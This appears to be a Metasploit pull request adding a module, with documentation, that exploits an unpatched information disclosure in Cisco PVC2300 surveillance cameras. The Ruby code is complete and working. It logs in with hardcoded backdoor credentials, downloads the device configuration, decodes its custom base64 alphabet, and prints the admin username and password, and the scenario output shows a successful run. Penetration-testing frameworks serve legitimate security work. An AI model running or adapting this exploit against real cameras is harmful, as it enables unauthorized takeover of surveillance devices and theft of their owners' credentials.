### PR TITLE
Add auxiliary gather module for Cisco PVC2300 camera information disclosure

### DIFF
--- a/documentation/modules/auxiliary/gather/cisco_pvc2300_download_config.md
+++ b/documentation/modules/auxiliary/gather/cisco_pvc2300_download_config.md
@@ -1,0 +1,55 @@
+## Vulnerable Application
+This module exploits an information disclosure vulnerability in Cisco PVC2300 cameras in order to download the configuration file
+containing the admin credentials for the web interface.
+
+The module first performs a basic check to see if the target is likely Cisco PVC2300. If so, the module attempts to obtain a sessionID
+via an HTTP GET request to the vulnerable /oamp/System.xml endpoint using the `login` action and the hardcoded credentials `L1_admin:L1_51`.
+
+If a session ID is obtained, the module uses it in another HTTP GET request to /oamp/System.xml that uses the `downloadConfigurationFile`
+action in an attempt to download the configuration file.
+
+The configuration file, if obtained, will be encdoded using base64 with a non-standard alphabet. In order to decode it,
+the module first translates the encoded configuration file from the default base64 alphabet to the custom alphabet.
+Then the configuration file is decoded using regular base64 and subsequently stored in the `loot` folder.
+
+Finally, the module attempts to extract the admin credentials to the web interface from the decoded configuration file.
+
+No known solution was made available for this vulnerability and no CVE has been published.
+It is therefore likely that most (if not all) Cisco PVC2300 cameras are affected.
+
+This module was successfully tested against several Cisco PVC2300 cameras.
+
+## Options
+No non-default options are configured.
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use auxiliary/gather/cisco_pvc2300_download_config`
+3. Do: `set RHOSTS [IP]`
+4. Do: `run`
+
+## Scenarios
+### Cisco PVC2300
+```
+Module options (auxiliary/gather/cisco_pvc_2300_info_disclosure):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   172.31.31.233    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+msf6 auxiliary(gather/cisco_pvc_2300_info_disclosure) > run
+[*] Running module against 172.31.31.233
+
+[*] The target may be vulnerable. Obtained sessionID 1122062985
+[+] Successfully downloaded the configuration file
+[*] Saving the full configuration file to /root/.msf4/loot/20220803124629_default_172.31.31.233_ciscopvc.config_489884.txt
+[*] Obtained device name PVC2300 POE Video Camera
+[+] Obtained the following admin credentials for the web interface from the configuration file:
+[*] admin username: admin
+[*] admin password: [obfuscated]
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/gather/cisco_pvc2300_download_config.rb
+++ b/modules/auxiliary/gather/cisco_pvc2300_download_config.rb
@@ -15,8 +15,8 @@ class MetasploitModule < Msf::Auxiliary
         {
           'Name' => 'Cisco PVC2300 POE Video Camera configuration download',
           'Description' => %q{
-            This module exploits an information disclosure vulnerablity in Cisco PVC2300 cameras in order to
-            download the configuration file containing the admin credentials for the web interface.
+            This module exploits an information disclosure vulnerability in Cisco PVC2300 cameras in order
+            to download the configuration file containing the admin credentials for the web interface.
 
             The module first performs a basic check to see if the target is likely Cisco PVC2300. If so, the
             module attempts to obtain a sessionID via an HTTP GET request to the vulnerable /oamp/System.xml

--- a/modules/auxiliary/gather/cisco_pvc2300_download_config.rb
+++ b/modules/auxiliary/gather/cisco_pvc2300_download_config.rb
@@ -1,0 +1,190 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        {
+          'Name' => 'Cisco PVC2300 POE Video Camera configuration download',
+          'Description' => %q{
+            This module exploits an information disclosure vulnerablity in Cisco PVC2300 cameras in order to
+            download the configuration file containing the admin credentials for the web interface.
+
+            The module first performs a basic check to see if the target is likely Cisco PVC2300. If so, the
+            module attempts to obtain a sessionID via an HTTP GET request to the vulnerable /oamp/System.xml
+            endpoint using hardcoded credentials.
+
+            If a session ID is obtained, the module uses it in another HTTP GET request to /oamp/System.xml
+            with the aim of downloading the configuration file. The configuration file, if obtained, is then
+            decoded and saved to the loot directory. Finally, the module attempts to extract the admin
+            credentials to the web interface from the decoded configuration file.
+
+            No known solution was made available for this vulnerability and no CVE has been published. It is
+            therefore likely that most (if not all) Cisco PVC2300 cameras are affected.
+
+            This module was successfully tested against several Cisco PVC2300 cameras.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'Craig Heffner', # vulnerability discovery and PoC
+            'Erik Wynter', # @wyntererik - Metasploit
+          ],
+          'References' => [
+            [ 'URL', 'https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-A-Hollywood-Hacker-Slides.pdf' ], # blackhat presentation - unofficial source
+            [ 'URL', 'https://media.blackhat.com/us-13/US-13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-A-Hollywood-Hacker-Slides.pdf'], # blackhat presentation - official source (not working)
+            [ 'URL', 'https://www.youtube.com/watch?v=B8DjTcANBx0'] # full blackhat presentation
+          ],
+          'DisclosureDate' => '2013-07-12',
+          'Notes' => {
+            'Stability' => [CRASH_SAFE],
+            'Reliability' => [REPEATABLE_SESSION], # the attack can be repeated, but a timeout of several minutes may be necessary between exploit attempts
+            'SideEffects' => [IOC_IN_LOGS]
+          }
+        }
+      )
+    )
+  end
+
+  def custom_base64_alphabet
+    'ACEGIKMOQSUWYBDFHJLNPRTVXZacegikmoqsuwybdfhjlnprtvxz0246813579=+'
+  end
+
+  def default_base64_alphabet
+    'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
+  end
+
+  def request_session_id
+    vprint_status('Attempting to obain a session ID')
+    # the creds used here are basically a backdoor
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'oamp', 'System.xml'),
+      'vars_get' => {
+        'action' => 'login',
+        'user' => 'L1_admin',
+        'password' => 'L1_51'
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed when trying to obtain a session ID')
+    end
+
+    unless res.code == 200
+      fail_with(Failure::NotVulnerable, "Received unexpected response code #{res.code} while trying to obtain a session ID.")
+    end
+
+    if res.headers.include?('sessionID') && !res.headers['sessionID'].blank?
+      session_id = res.headers['sessionID']
+      print_status("The target may be vulnerable. Obtained sessionID #{session_id}")
+      return session_id
+    end
+
+    # try to check the status message in the response body
+    # the status may indicate if the target is perhaps only temporarily unavailable, which was encountered when testing the module repeatedly
+    status = res.body.scan(%r{<statusString>(.*?)</statusString>})&.flatten&.first&.strip
+    if status.blank?
+      fail_with(Failure::NotVulnerable, 'Failed to obtain a session ID.')
+    end
+
+    if status == 'try it later'
+      fail_with(Failure::Unknown, "Failed to obtain a session ID. The server responded with status: #{status}. The target may still be vulnerable.")
+    else
+      fail_with(Failure::NotVulnerable, "Failed to obtain a session ID. The server responded with status: #{status}")
+    end
+  end
+
+  def download_config_file(session_id)
+    vprint_status('Attempting to download the configuration file')
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'oamp', 'System.xml'),
+      'headers' => {
+        'sessionID' => session_id
+      },
+      'vars_get' => {
+        'action' => 'downloadConfigurationFile'
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed when trying to download the configuration file')
+    end
+
+    unless res.code == 200 && !res.body.empty?
+      fail_with(Failure::NotVulnerable, 'Failed to obtain the configuration file')
+    end
+
+    # if the exploit doesn't work, the response body should be empty. So if we have anything, we can assume we're in business
+    res.body
+  end
+
+  def decode_config_file(config_file_encoded)
+    # if we've made it all the way here, this shouldn't break, but better safe than sorry
+    begin
+      config_file_base64 = config_file_encoded.tr(custom_base64_alphabet, default_base64_alphabet)
+      config_file_decoded = Base64.decode64(config_file_base64)
+    rescue StandardError => e
+      print_error('Encountered the following error when attempting to decode the configuration file:')
+      print_error(e)
+      fail_with(Failure::Unknown, 'Failed to decode the configuration file')
+    end
+
+    # let's just save the full config at this point
+    path = store_loot('ciscopvc.config', 'text/plain', rhost, config_file_decoded)
+    print_good('Successfully downloaded the configuration file')
+    print_status("Saving the full configuration file to #{path}")
+
+    # let's see if we can grab the device name from the config file
+    if config_file_decoded =~ /comment=.*? Video Camera/
+      device_name = config_file_decoded.scan(/comment=(.*?)$/)&.flatten&.first&.strip
+      unless device_name.blank?
+        print_status("Obtained device name #{device_name}")
+      end
+    end
+
+    # try to grab the admin username and password from the config file
+    admin_name = nil
+    admin_password = nil
+    if config_file_decoded.include?('admin_name')
+      admin_name = config_file_decoded.scan(/admin_name=(.*?)$/)&.flatten&.first&.strip
+    end
+
+    if config_file_decoded.include?('admin_password')
+      admin_password = config_file_decoded.scan(/admin_password=(.*?)$/)&.flatten&.first&.strip
+    end
+
+    if admin_name.blank? && admin_password.blank?
+      print_error('Failed to obtain the admin credentials from the configuration file')
+    else
+      print_good('Obtained the following admin credentials for the web interface from the configuration file:')
+      print_status("admin username: #{admin_name}")
+      print_status("admin password: #{admin_password}")
+    end
+  end
+
+  def run
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path))
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed')
+    end
+
+    # string togetether a few checks to make it more likely we're dealing with a Cisco camera
+    unless res.code == 401 && res.headers.include?('WWW-Authenticate') && res.headers['WWW-Authenticate'] == 'Basic realm="IP Camera"'
+      fail_with(Failure::NoTarget, 'Target is not a Cisco PVC2300 POE Video Camera')
+    end
+    vprint_status('Target seems to be a Cisco camera')
+
+    session_id = request_session_id
+    config_file = download_config_file(session_id)
+    decode_config_file(config_file)
+  end
+end

--- a/modules/auxiliary/gather/cisco_pvc2300_download_config.rb
+++ b/modules/auxiliary/gather/cisco_pvc2300_download_config.rb
@@ -169,10 +169,9 @@ class MetasploitModule < Msf::Auxiliary
       print_good('Obtained the following admin credentials for the web interface from the configuration file:')
       print_status("admin username: #{admin_name}")
       print_status("admin password: #{admin_password}")
+      # save the creds to the db
+      report_creds(admin_name, admin_password)
     end
-
-    # save the creds to the db
-    report_creds(admin_name, admin_password)
   end
 
   def report_creds(username, password)


### PR DESCRIPTION
# About
This change adds a new `auxiliary/gather` module for an information disclosure bug in Cisco PVC2300 cameras that was disclosed at blackhat all the way back in 2013 and has never been fixed. The vulnerability allows unauthenticated users to download the configuration file that contains the plaintext admin credentials to the web interface.

# Vulnerable systems
No known solution was made available for this vulnerability and no CVE has been published. It is therefore likely that most (if not all) Cisco PVC2300 cameras are affected.

# Notes
- I probably will not have access to a target after tomorrow, so I will send spool files with `HTTPTRACE` output from the module to `msfdev@metasploit.com`. The exploit is really very simple so I think this should suffice.
- The original blackhat presentation is available [here](https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-A-Hollywood-Hacker-Slides.pdf) (pdf, starts at page 36)
- I will add docs later. I just want to push this out now

# Scenario
```
[*] Spooling to file msf_cisco_pvc_2300_info_disclosure_spool.txt...
msf6 auxiliary(gather/cisco_pvc_2300_info_disclosure) > options 

Module options (auxiliary/gather/cisco_pvc_2300_info_disclosure):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.31.31.233    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

msf6 auxiliary(gather/cisco_pvc_2300_info_disclosure) > run
[*] Running module against 172.31.31.233

[*] The target may be vulnerable. Obtained sessionID 1122062985
[+] Successfully downloaded the configuration file
[*] Saving the full configuration file to /root/.msf4/loot/20220803124629_default_172.31.31.233_ciscopvc.config_489884.txt
[*] Obtained device name PVC2300 POE Video Camera
[+] Obtained the following admin credentials for the web interface from the configuration file:
[*] admin username: admin
[*] admin password: [obfuscated]
[*] Auxiliary module execution completed
```